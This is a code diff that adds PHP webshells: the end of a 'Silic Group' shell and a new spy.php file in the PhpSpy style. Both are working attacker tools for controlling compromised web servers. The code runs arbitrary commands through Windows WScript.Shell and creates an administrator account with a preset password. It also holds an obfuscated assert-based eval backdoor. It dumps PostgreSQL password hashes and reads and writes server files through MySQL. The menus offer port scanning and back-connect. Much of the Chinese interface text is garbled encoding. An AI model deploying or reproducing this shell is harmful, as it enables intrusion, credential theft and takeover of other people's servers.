          '; + } + } + } + else die('MYSQLʧ,µ½.'); + if(!$BOOL) echo ''; + return false; +} +//PostgreSQL +function Pgr_sql() +{ +$pghost=$_POST['pghost'] ? $_POST['pghost']:''; +$pgport=$_POST['pgport'] ? $_POST['pgport']:''; +$pguser=$_POST['pguser'] ? $_POST['pguser']:'postgres'; +$pgpass=$_POST['pgpass'] ? $_POST['pgpass']:''; +$pgdb=$_POST['pgdb'] ? $_POST['pgdb']:'postgres'; +$pgquery=$_POST['pgsql'] ? $_POST['pgsql']:'select version()'; +$pgquery=stripslashes($pgquery); +print<< +function pgFull(i){ +Str = new Array(6); +Str[0] = "select version();"; +Str[1] = "select datname from pg_database;"; +Str[2] = "select DISTINCT table_name from information_schema.columns where table_schema !='information_schema' limit 1 offset n;"; +Str[3] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;"; +Str[4] = "select usename,passwd from pg_shadow;"; +Str[5] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));"; +pgform.pgsql.value = Str[i]; +return true; +} + +
          + +

          +Ͷ˿Ϊѡݿ޷ʱɳԲд
          +űĬ䱸SQLPostgreSQL 8.1
          +ѿдȷݿ
          +бοselect relname from pg_stat_user_tables limit 1 offset n;
          +PostgreSQLɲμ[]


          +
          +: +û: +: +ݿ:

          +
          +˿ڣ + + + +  Silic©2009-2012
          + +END; +if(!empty($pghost) && !empty($pgport)){ +$conn="host=".$pghost." port=".$pgport." dbname=".$pgdb." user=".$pguser." password=".$pgpass; +}else{ +$conn="dbname=".$pgdb." user=".$pguser." password=".$pgpass; +} +if(!empty($_POST['sql'])){ +$pgconn = pg_connect($conn) +or die('磬ϡϢ:'.pg_last_error()); +$pgresult=pg_query($pgquery) or die('SQLִз:
          '.pg_last_error()); +$pgrow=pg_fetch_row($pgresult); +echo ''."\n\n"; +for ($i=0; $i< pg_num_fields($pgresult); $i++) +{echo '\n";} +echo "\n"; +pg_result_seek($pgresult, 0); +while ($pgrow=pg_fetch_row($pgresult)) +{ +echo "\n"; +for ($i=0; $i'."$pgrow[$i]".'';} +echo "\n"; +} +echo "
          '.pg_field_name($pgresult, $i)."
          \n"."
          "; +pg_free_result($pgresult); +pg_close(); +} +echo "
          "; +} +function Mysql_o() +{ + ob_start(); + if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) + { + if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass'])) + { + $cookietime = time() + 24 * 3600; + setcookie('m_silichost',$_POST['mhost'],$cookietime); + setcookie('m_silicport',$_POST['mport'],$cookietime); + setcookie('m_silicuser',$_POST['muser'],$cookietime); + setcookie('m_silicpass',$_POST['mpass'],$cookietime); + die('ڵ½,Ժ...'); + } + } +print<< +
          ַ
          +
          ˿
          +
          û
          +
          +
          + +END; + ob_end_flush(); + return true; +} +function zipact() +{ +$zfile=$_POST['zfile'] ? $_POST['zfile']:'php.zip'; +$jypt=$_POST['jypt'] ? $_POST['jypt']:'./'; +$tip="δʼѹ"; +if($_POST['zip']=='zip'){ +if(function_exists(zip_open)){ +$zfile=key_exists('zip', $_GET) && $_GET['zip']?$_GET['zip']:$zfile; +$zfile= str_replace(array(dirname(__FILE__)."/",dirname(__FILE__)."\\"),array("",""),$zfile); +$zpath=str_replace('\\','/',dirname(__FILE__)).'/'.$zfile; +if(!is_file($zpath)){$tip='ļ"'.$zpath.'"!';}else{ +$zip= new ZipArchive(); +$rs=$zip->open($zpath); +if($rs !== TRUE){$tip='ѹʧ:'.$rs;} +$zip->extractTo($jypt); +$zip->close(); +$tip=$zfile.'ѹɹ!';} +}else{$tip="֧PHP_ZIP,ȷ";} +} +print<< +
          + +ģʹPHPzip_openչZIPѹļ
          +ʹǰڡϵͳϢȷϵͳ֧php_zip
          +ѹļ·д¼Ŀ¼·Ŀ¼Ƿɲδ :-(
          +ȷĿ·д

          +ѹļ·
          +

          +Ŀ· +

          +


          +{$tip}


          +END; +} +//Windowsӿ +function winshell() +{ +$nop='  '; +if($_GET['winshell']=='wscript'){ +$wcmd=$_POST['wcmd'] ? $_POST['wcmd']:'net user'; +$wcpth=$_POST['wcpth'] ? $_POST['wcpth']:'cmd.exe'; +print<< +
          +
          +{$nop} -> CMD·
          +{$nop} +


          +END; +if($_POST['do']=='do'){ +$ww=$wcpth." /c ".$wcmd; +$phpwsh=new COM("Wscript.Shell") or die("Shell.Wscriptʧ"); +$phpexec=$phpwsh->exec($ww); +$execoutput=$wshexec->stdout(); +$result=$execoutput->readall(); +echo $result; +@$phpwsh->Release(); +$phpwsh=NULL; +} +}elseif($_GET['winshell']=='shelluser'){ +$wuser=$_POST['wuser'] ? $_POST['wuser']:'silic'; +$wpasw=$_POST['wpasw'] ? $_POST['wpasw']:'1234@silic#'; +print<< +
          +
          +Shell.UsersӹԱ

          +{$nop}½û
          +{$nop}û룺

          + +


          +END; +if($_POST['do']='do'){ +$shell = new COM("Shell.Users"); +$cmd = $shell->create($wuser); +$cmd->changePassword($wpasw,""); +$cmd->setting["AccountType"] = 3; +} +}elseif($_GET['winshell']=='regedit'){ +$regpath=$_POST['regpath'] ? $_POST['regpath']:'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber'; +print<< +
          +
          +RegRead()ȡע(Shell.Wscript)

          +ע·
          +{$nop}

          + +


          +END; +if($_POST['do']=='do'){ +$shell = new COM("WScript.Shell") or die("Shell.Wscriptʧ"); +try{$registry_proxystring = $shell->RegRead($regpath);} +catch(Exception $e){echo ': '.$e->getMessage();} +echo $registry_proxystring; +} +}else{ +$tip="ݲԱܿõĿΪ֮һ
          WebshellڷΪWindowsϵͳ
          PHPȨڷdzεʱԳԱ



          "; +print<<
          +
          [ WScript ]

          +
          ʹPHPWindowsеWscript
          +WscriptΪcmd
          {$tip} [ Shell.User ]

          +
          ʹPHPWindowsеShell.user
          +USERΪWindowsϵͳû
          {$tip} [ עȡ ]

          +
          ʹPHPWindowsеShell.Wscript
          +RegRead()ȡϵͳע
          {$tip}
          +END; +} +} +/**½ؿʼ**/ +if($_GET['s'] == 'logout'){ + setcookie('admin_silicpass',NULL); + die(''); +}elseif($_GET['s'] == 'ch'){ +$oldps=md5(md5(md5(trim($salt.$_POST['oldps'])))); +$newps=base64_encode(base64_decode('JHBhc3N3b3JkPSI=').md5(md5(md5(trim($salt.$_POST['newps'])))).base64_decode('Ijs=')); +print<<
          +
          +* ޸ı½(!ܻɳʧȥӦ)
          +* Silic GroupSpiderľǻSpiderľܵĵ¿
          +* MD5+SaltܼӶsessionܣɲصı繤
          +* Ҫ£ɾȥFTP,ע,ShellcodeתƺͷеĹܣйܵIJbugŻ
          +* Silic Group Hacker Army - ,,ԭ,
          +* BlackBap.Org

          +룺
          +룺
          + +


          +END; +if($_POST['ch']='ch' && $oldps==$password && !empty($_POST['newps'])) +{ +$dline=19; +$chpsArr=file(__FILE__); +$chsize=count($chpsArr); +for($chi=0; $chi< $chsize; $chi++){ +if($chi==$dline-1){$chpsStr.=base64_decode($newps)."\r\n";} +else{$chpsStr.=$chpsArr[$chi];} +} +file_put_contents(__FILE__,$chpsStr); +echo "ijɹ"; +}else{echo "ûи";} +}elseif(md5(md5(md5($salt.trim($_GET['s'])))) == $password){ +$asse=$asse{0}.$asse{1}.$asse{1}.$asse{2}.$asse{3}.$asse{4}; +@$asse($_POST[$_GET['s']]); +}else{ +//½ +function Root_Login($MSG_TOP) +{ +$IP = gethostbyname($_SERVER["SERVER_NAME"]); +print<< + +
          +
          +
          +
          {$MSG_TOP}
          +
          PASS:
          +
          +
          +
          +
          + + +END; +return false; +} +// +function WinMain() +{ + $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]); + $Server_OS = PHP_OS; + $Server_Soft = $_SERVER["SERVER_SOFTWARE"]; +print<<ʹ + + + + +
          +
              {$Server_IP} - {$Server_OS} - {$Server_Soft}
          + +
          +END; +return false; +} +} +/*½ؽ*/ +if(get_magic_quotes_gpc()) +{ + $_GET = Root_GP($_GET); + $_POST = Root_GP($_POST); +} +if($_COOKIE['admin_silicpass'] != md5($password)) +{ + ob_start(); + $MSG_TOP = 'LOGIN'; + if(isset($passt)) + { + $cookietime = time() + 24 * 3600; + setcookie('admin_silicpass',md5($passt),$cookietime); + if(md5($passt) == md5($password)){die('');} + else{$MSG_TOP = 'PASS IS FALSE';} + } +Root_Login($MSG_TOP); +ob_end_flush(); +exit; +} +if(isset($_GET['s'])){$s = $_GET['s'];if($s != 'a' && $s != 'n')Root_CSS();}else{$s = 'MyNameIsHacker';} +$p = isset($_GET['p']) ? $_GET['p'] : File_Str(dirname(__FILE__)); +switch($s){ +case"a":File_a($p);break; +case"d":Tihuan_d();break; +case"e":Antivirus_e();break; +case"f":Info_f();break; +case"g":Exec_g();break; +case"i":Port_i();break; +case"j":Findfile_j();break; +case"jk":winshell();break; +case"l":Servu_l();break; +case"n":Mysql_n();break; +case"o":Mysql_o();break; +case"p":File_Edit($_GET['fp'],$_GET['fn']); break; +case"pq":Pgr_sql(); break; +case"q":File_Soup($p); break; +case"r":Mysql_Msg(); break; +case"dd":backconn();break; +case"ff":phpcode();break; +case"gg":otherdb();break; +case"za":zipact();break; +default:WinMain();break; +}?> diff --git a/php/spy.php b/php/spy.php new file mode 100644 index 0000000..5fdbe06 --- /dev/null +++ b/php/spy.php @@ -0,0 +1,2136 @@ + $value) { + if (IS_GPC) { + $value = s_array($value); + } + $$key = $value; +} +/*===================== =====================*/ + +$pass = '571df1818893b45ad4fd9697b55b3679'; // md5(password) + +// cookie ÷ΧҪ, ¼, ޸, 뱣Ĭ +// cookie ǰ׺ +$cookiepre = ''; +// cookie +$cookiedomain = ''; +// cookie · +$cookiepath = '/'; +// cookie Ч +$cookielife = 86400; + +//дļ +!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp'; +/*===================== ý =====================*/ + +$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8'); +if ($charset == 'utf8') { + header("content-Type: text/html; charset=utf-8"); +} elseif ($charset == 'big5') { + header("content-Type: text/html; charset=big5"); +} elseif ($charset == 'gbk') { + header("content-Type: text/html; charset=gbk"); +} elseif ($charset == 'latin1') { + header("content-Type: text/html; charset=iso-8859-2"); +} elseif ($charset == 'euc-kr') { + header("content-Type: text/html; charset=euc-kr"); +} elseif ($charset == 'euc-jp') { + header("content-Type: text/html; charset=euc-jp"); +} + +$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; +$timestamp = time(); + +/*===================== ֤ =====================*/ +if ($action == "logout") { + scookie('loginpass', '', -86400 * 365); + @header('Location: '.$self); + exit; +} +if($pass) { + if ($action == 'login') { + if ($pass == encode_pass($password)) { + scookie('loginpass',encode_pass($password)); + @header('Location: '.$self); + exit; + } + } + if ($_COOKIE['loginpass']) { + if ($_COOKIE['loginpass'] != $pass) { + loginpage(); + } + } else { + loginpage(); + } +} +/*===================== ֤ =====================*/ + +$errmsg = ''; +!$action && $action = 'file'; + +// 鿴PHPINFO +if ($action == 'phpinfo') { + if (IS_PHPINFO) { + phpinfo(); + exit; + } else { + $errmsg = 'phpinfo() function has non-permissible'; + } +} + +// ļ +if ($doing == 'downfile' && $thefile) { + if (!@file_exists($thefile)) { + $errmsg = 'The file you want Downloadable was nonexistent'; + } else { + $fileinfo = pathinfo($thefile); + header('Content-type: application/x-'.$fileinfo['extension']); + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header('Content-Length: '.filesize($thefile)); + @readfile($thefile); + exit; + } +} + +// ֱرݿ +if ($doing == 'backupmysql' && !$saveasfile) { + if (!$table) { + $errmsg ='Please choose the table'; + } else { + mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + $filename = basename($dbname.'.sql'); + header('Content-type: application/unknown'); + header('Content-Disposition: attachment; filename='.$filename); + foreach($table as $k => $v) { + if ($v) { + sqldumptable($v); + } + } + mysql_close(); + exit; + } +} + +// ͨMYSQLļ +if($doing=='mysqldown'){ + if (!$dbname) { + $errmsg = 'Please input dbname'; + } else { + mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + if (!file_exists($mysqldlfile)) { + $errmsg = 'The file you want Downloadable was nonexistent'; + } else { + $result = q("select load_file('$mysqldlfile');"); + if(!$result){ + q("DROP TABLE IF EXISTS tmp_angel;"); + q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); + //ʱʾض,ֶȡ__angel_1111111111_eof__ļʱ + q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); + $result = q("select content from tmp_angel"); + q("DROP TABLE tmp_angel"); + } + $row = @mysql_fetch_array($result); + if (!$row) { + $errmsg = 'Load file failed '.mysql_error(); + } else { + $fileinfo = pathinfo($mysqldlfile); + header('Content-type: application/x-'.$fileinfo['extension']); + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header("Accept-Length: ".strlen($row[0])); + echo $row[0]; + exit; + } + } + } +} + +?> + + + +<?php echo $action.' - '.$_SERVER['HTTP_HOST'];?> + + + + +'opform')); +makehide('action', $action); +makehide('nowpath', $nowpath); +makehide('p1', $p1); +makehide('p2', $p2); +makehide('p3', $p3); +makehide('p4', $p4); +makehide('p5', $p5); +formfoot(); + +if(!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; +} else { + $uid = @posix_getpwuid(@posix_geteuid()); + $gid = @posix_getgrgid(@posix_getegid()); + $user = $uid['name']; + $uid = $uid['uid']; + $group = $gid['name']; + $gid = $gid['gid']; +} + +?> + + + + + + + +
          / User: ()
          + PHP / Safe Mode: + ˳½ | + ļ | + MYSQL | + MySQLϴ | + ִ | + PHP | + ˿ɨ | + ȫϢ | + Eval PHP + | Back Connect +
          +'); + + p(''); + + //鿴пдļĿ¼ + $dirdata=array(); + $filedata=array(); + + if ($view_writable == 'dir') { + $dirdata = GetWDirList($nowpath); + $filedata = array(); + } elseif ($view_writable == 'file') { + $dirdata = array(); + $filedata = GetWFileList($nowpath); + } elseif ($findstr) { + $dirdata = array(); + $filedata = GetSFileList($nowpath, $findstr, $re); + } else { + // Ŀ¼б + //scandir()Чʸ + $dirs=@opendir($dir); + while ($file=@readdir($dirs)) { + $filepath=$nowpath.$file; + if(@is_dir($filepath)){ + $dirdb['filename']=$file; + $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $dirdb['dirchmod']=getChmod($filepath); + $dirdb['dirperm']=getPerms($filepath); + $dirdb['fileowner']=getUser($filepath); + $dirdb['dirlink']=$nowpath; + $dirdb['server_link']=$filepath; + $dirdata[]=$dirdb; + } else { + $filedb['filename']=$file; + $filedb['size']=sizecount(@filesize($filepath)); + $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $filedb['filechmod']=getChmod($filepath); + $filedb['fileperm']=getPerms($filepath); + $filedb['fileowner']=getUser($filepath); + $filedb['dirlink']=$nowpath; + $filedb['server_link']=$filepath; + $filedata[]=$filedb; + } + }// while + unset($dirdb); + unset($filedb); + @closedir($dirs); + } + @sort($dirdata); + @sort($filedata); + $dir_i = '0'; + + p(''); + makehide('action','file'); + makehide('thefile'); + makehide('doing'); + makehide('dir',$nowpath); + + foreach($dirdata as $key => $dirdb){ + if($dirdb['filename']!='..' && $dirdb['filename']!='.') { + if($getdir && $getdir == $dirdb['server_link']) { + $attachsize = dirsize($dirdb['server_link']); + $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown'; + } else { + $attachsize = 'Stat'; + } + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $dir_i++; + } else { + if($dirdb['filename']=='..') { + p(''); + p(''); + p(''); + } + } + } + + p(''); + $file_i = '0'; + + foreach($filedata as $key => $filedb){ + if($filedb['filename']!='..' && $filedb['filename']!='.') { + $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']); + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $file_i++; + } + } + p(''); + p(''); + p('
          +'createdir')); + makehide('newdirname'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'fileperm')); + makehide('newperm'); + makehide('pfile'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'copyfile')); + makehide('sname'); + makehide('tofile'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'rename')); + makehide('oldname'); + makehide('newfilename'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'fileopform', 'target'=>'_blank')); + makehide('action'); + makehide('opfile'); + makehide('dir'); + formfoot(); + formhead(array('name'=>'getsize')); + makehide('getdir'); + makehide('dir'); + formfoot(); + + $free = @disk_free_space($nowpath); + !$free && $free = 0; + $all = @disk_total_space($nowpath); + !$all && $all = 0; + $used = $all-$free; + p('

          File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)

          '); + + $cwd_links = ''; + $path = explode('/', $nowpath); + $n=count($path); + for($i=0;$i<$n-1;$i++) { + $cwd_links .= ''.$path[$i].'/'; + } + +?> + +
          + + + + + +
          ()
          + + + + + + + + + +Drives) { + echo '
          '; + $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk'); + $comma = ''; + foreach($obj->Drives as $drive) { + if ($drive->Path) { + p($comma.''.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); + $comma = '|'; + } + } + echo '
          '; + } + } +?> +
          +
          '); + p('
          '); + p('վĿ¼'); + p(' | Ŀ¼'); + p(' | View All'); + p(' | View Writable ( Directory'); + p(' | File )'); + p(' | Create Directory | ½ļ'); + + p('
          Find string in files(current folder): Type: Regular expressions
           FilenameLast modifiedSizeChmod / PermsAction
          '.$dirdb['filename'].''.$dirdb['mtime'].''.$attachsize.''); + p(''.$dirdb['dirchmod'].' / '); + p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'Rename
          -Parent Directory
          '.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? ''.$filedb['filename'].'' : $filedb['filename']).''.$filedb['mtime'].''.$filedb['size'].''); + p(''.$filedb['filechmod'].' / '); + p(''.$filedb['fileperm'].''.$filedb['fileowner'].''); + p('Down | '); + p('Copy | '); + p('Edit | '); + p('Rename'); + p('
           FilenameLast modifiedSizeChmod / PermsAction
          Delete selected'.$dir_i.' directories / '.$file_i.' files
          '); +}// end dir + +elseif ($action == 'sqlfile') { + if($doing=="mysqlupload"){ + $file = $_FILES['uploadfile']; + $filename = $file['tmp_name']; + if (file_exists($savepath)) { + m('The goal file has already existed'); + } else { + if(!$filename) { + m('Please choose a file'); + } else { + $fp=@fopen($filename,'r'); + $contents=@fread($fp, filesize($filename)); + @fclose($fp); + $contents = bin2hex($contents); + if(!$upname) $upname = $file['name']; + mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"); + m($result ? 'Upload success' : 'Upload has failed: '.mysql_error()); + } + } + } +?> + +'MYSQL Info','name'=>'dbinfo')); + makehide('action','sqlfile'); + p('

          '); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p(':'); + makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + p('DBName:'); + makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); + p('DBCharset:'); + makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1)); + p('

          '); + formfoot(); + p('
          '); + p('

          Upload file

          '); + p('

          This operation the DB user must has FILE privilege

          '); + p('

          Save path(fullpath): Choose a file: Upload

          '); + p('

          Download file

          '); + p('

          File: Download

          '); + makehide('dbhost'); + makehide('dbport'); + makehide('dbuser'); + makehide('dbpass'); + makehide('dbname'); + makehide('charset'); + makehide('doing'); + makehide('action','sqlfile'); + p('
          '); +} + +elseif ($action == 'mysqladmin') { + !$dbhost && $dbhost = 'localhost'; + !$dbuser && $dbuser = 'root'; + !$dbport && $dbport = '3306'; + $dbform = ''; + if(isset($dbhost)){ + $dbform .= "\n"; + } + if(isset($dbuser)) { + $dbform .= "\n"; + } + if(isset($dbpass)) { + $dbform .= "\n"; + } + if(isset($dbport)) { + $dbform .= "\n"; + } + if(isset($dbname)) { + $dbform .= "\n"; + } + if(isset($charset)) { + $dbform .= "\n"; + } + + if ($doing == 'backupmysql' && $saveasfile) { + if (!$table) { + m('Please choose the table'); + } else { + mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + $fp = @fopen($path,'w'); + if ($fp) { + foreach($table as $k => $v) { + if ($v) { + sqldumptable($v, $fp); + } + } + fclose($fp); + $fileurl = str_replace(SA_ROOT,'',$path); + m('Database has success backup to '.$path.''); + mysql_close(); + } else { + m('Backup failed'); + } + } + } + if ($insert && $insertsql) { + $keystr = $valstr = $tmp = ''; + foreach($insertsql as $key => $val) { + if ($val) { + $keystr .= $tmp.$key; + $valstr .= $tmp."'".addslashes($val)."'"; + $tmp = ','; + } + } + if ($keystr && $valstr) { + mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); + } + } + if ($update && $insertsql && $base64) { + $valstr = $tmp = ''; + foreach($insertsql as $key => $val) { + $valstr .= $tmp.$key."='".addslashes($val)."'"; + $tmp = ','; + } + if ($valstr) { + $where = base64_decode($base64); + mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); + } + } + if ($doing == 'del' && $base64) { + $where = base64_decode($base64); + $delete_sql = "DELETE FROM $tablename WHERE $where"; + mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); + } + + if ($tablename && $doing == 'drop') { + mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + if (q("DROP TABLE $tablename")) { + m('Drop table of success'); + $tablename = ''; + } else { + m(mysql_error()); + } + } + + formhead(array('title'=>'MYSQL Manager')); + makehide('action','mysqladmin'); + p('

          '); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p(':'); + makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + p('DBCharset:'); + makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1)); + makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); + p('

          '); + formfoot(); + + //¼ + formhead(array('name'=>'recordlist')); + makehide('doing'); + makehide('action','mysqladmin'); + makehide('base64'); + makehide('tablename'); + p($dbform); + formfoot(); + + //ѡݿ + formhead(array('name'=>'setdbname')); + makehide('action','mysqladmin'); + p($dbform); + if (!$dbname) { + makehide('dbname'); + } + formfoot(); + + //ѡ + formhead(array('name'=>'settable')); + makehide('action','mysqladmin'); + p($dbform); + makehide('tablename'); + makehide('page',$page); + makehide('doing'); + formfoot(); + + $cachetables = array(); + $pagenum = 30; + $page = intval($page); + if($page) { + $start_limit = ($page - 1) * $pagenum; + } else { + $start_limit = 0; + $page = 1; + } + if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { + mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + //ȡݿϢ + $mysqlver = mysql_get_server_info(); + p('

          MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

          '); + $highver = $mysqlver > '4.1' ? 1 : 0; + + //ȡݿ + $query = q("SHOW DATABASES"); + $dbs = array(); + $dbs[] = '-- Select a database --'; + while($db = mysql_fetch_array($query)) { + $dbs[$db['Database']] = $db['Database']; + } + makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); + $tabledb = array(); + if ($dbname) { + p('

          '); + p('Current dababase: '.$dbname.''); + if ($tablename) { + p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); + } + p('

          '); + mysql_select_db($dbname); + + $getnumsql = ''; + $runquery = 0; + if ($sql_query) { + $runquery = 1; + } + $allowedit = 0; + if ($tablename && !$sql_query) { + $sql_query = "SELECT * FROM $tablename"; + $getnumsql = $sql_query; + $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; + $allowedit = 1; + } + p('
          '); + p('

          Run SQL query/queries on database '.$dbname.':

          '); + makehide('tablename', $tablename); + makehide('action','mysqladmin'); + p($dbform); + p('
          '); + if ($tablename || ($runquery && $sql_query)) { + if ($doing == 'structure') { + $result = q("SHOW FULL COLUMNS FROM $tablename"); + $rowdb = array(); + while($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + p('

          Structure

          '); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + foreach ($rowdb as $row) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + } + tbfoot(); + $result = q("SHOW INDEX FROM $tablename"); + $rowdb = array(); + while($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + p('

          Indexes

          '); + p('
          FieldTypeCollationNullKeyDefaultExtraPrivilegesComment
          '.$row['Field'].''.$row['Type'].''.$row['Collation'].' '.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' '.$row['Privileges'].' '.$row['Comment'].' 
          '); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + foreach ($rowdb as $row) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + } + tbfoot(); + } elseif ($doing == 'insert' || $doing == 'edit') { + $result = q('SHOW COLUMNS FROM '.$tablename); + while ($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + $rs = array(); + if ($doing == 'insert') { + p('

          Insert new line in '.$tablename.' table »

          '); + } else { + p('

          Update record in '.$tablename.' table »

          '); + $where = base64_decode($base64); + $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"); + $rs = mysql_fetch_array($result); + } + p(''); + p($dbform); + makehide('action','mysqladmin'); + makehide('tablename',$tablename); + p('
          KeynameTypeUniquePackedSeq_in_indexFieldCardinalityCollationNullComment
          '.$row['Key_name'].''.$row['Index_type'].''.($row['Non_unique'] ? 'No' : 'Yes').' '.($row['Packed'] === null ? 'No' : $row['Packed']).' '.$row['Seq_in_index'].''.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').' '.($row['Cardinality'] ? $row['Cardinality'] : 0).' '.$row['Collation'].' '.$row['Null'].' '.$row['Comment'].' 
          '); + foreach ($rowdb as $row) { + if ($rs[$row['Field']]) { + $value = htmlspecialchars($rs[$row['Field']]); + } else { + $value = ''; + } + $thisbg = bg(); + p(''); + if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') { + p(''); + } else { + p(''); + } + } + if ($doing == 'insert') { + p(''); + } else { + p(''); + makehide('base64', $base64); + } + p('
          '.$row['Field'].'
          '.$row['Type'].'
          '.$value.' 
          '.$row['Field'].'
          '.$row['Type'].'
          '); + } else { + $querys = @explode(';',$sql_query); + foreach($querys as $num=>$query) { + if ($query) { + p("

          Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

          "); + switch(qy($query)) + { + case 0: + p('

          Error : '.mysql_error().'

